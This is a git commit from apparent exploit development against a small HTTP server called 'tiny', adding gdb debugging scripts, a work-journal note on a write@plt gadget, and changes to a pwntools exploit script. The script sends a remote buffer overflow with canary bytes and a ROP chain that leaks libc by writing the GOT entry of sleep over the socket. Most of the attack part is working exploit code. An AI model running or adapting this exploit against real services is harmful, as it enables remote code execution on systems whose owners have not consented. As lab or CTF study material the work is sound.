got a libc leak

robalb · robalb · commit 593e011313bc · 2024-08-14T23:19:50.000+02:00
diff --git a/debug.sh b/debug.sh
@@ -0,0 +1 @@
+gdb -x debugcmd.txt -p $(pgrep tiny)
diff --git a/debugcmd.txt b/debugcmd.txt
@@ -0,0 +1,3 @@
+set follow-fork-mode child
+b *process+266
+continue
diff --git a/docs/work-journal.md b/docs/work-journal.md
@@ -672,3 +672,14 @@ the syscall will EFAULT
 ```
 sudo -E gdb -p $(pgrep tiny)
 ```
+
+
+wait this is good:
+     0x000000000000260c <+45>:    mov    rdx,rbx
+     0x000000000000260f <+48>:    mov    rsi,rbp
+     0x0000000000002612 <+51>:    mov    edi,r12d
+     0x0000000000002615 <+54>:    call   0x22d0 <write@plt>
+
+this gives us access to write, by using
+the registers we control:
+rbx,rbp, r12
diff --git a/expl_all.py b/expl_all.py
@@ -39,11 +39,11 @@ def package_http_request(path):
         ])
 
 
-def run_expl(payload, log=True):
+def run_expl(payload, padding=PADDING_SIZE, log=True):
     p = remote(ADDR, PORT)
     # buffer overflow
     expl = b''
-    expl += b'a'*PADDING_SIZE
+    expl += b'a'*padding
     expl += payload
 
     #url encode all the bytes that would block the http parser
@@ -225,14 +225,27 @@ def main():
 
     #leak libc rop chain
     rop = ROP(e)
+    # this clobbers rdx with the pointer in rdi
     # rop.call('strlen', [e.symbols['_IO_stdin_used']+0x16])
 
+    # this clobbers rdx with a pointer
+    # rop.call('getcwd', [0,0])
+    read_addr = e.symbols['_IO_stdin_used']+0x18 #html string
+    read_addr = e.got['sleep']
+    rop(r12=4, rbx=20, rbp=read_addr)
+    # rop.r12 = 4
+    # rop.rbx = 20
+    # rop.rbp = e.symbols['_IO_stdin_used']+0x18 #html string
+
+    write_primitive = program_base_offset+0x260c 
+    rop.raw(write_primitive)
+
     #these two work, but we need a value not too large in rdi
-    rop.call('write', [4, (e.symbols['_IO_stdin_used']+0x18)]) #html string
-    rop.call('write', [4, e.got['sleep']])
+    # rop.call('write', [4, (e.symbols['_IO_stdin_used']+0x18)]) #html string
     # rop.call('write', [4, e.got['sleep']])
+
     # rop.call('client_error', [4, e.got['sleep']])
-    rop.call('sleep', [4]) #this sleep is here to help debugging
+    # rop.call('sleep', [4]) #this sleep is here to help debugging
 
     payload  = b''
     payload += canary_bytes

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,3 @@`
	`1`	`+set follow-fork-mode child`
	`2`	`+b *process+266`
	`3`	`+continue`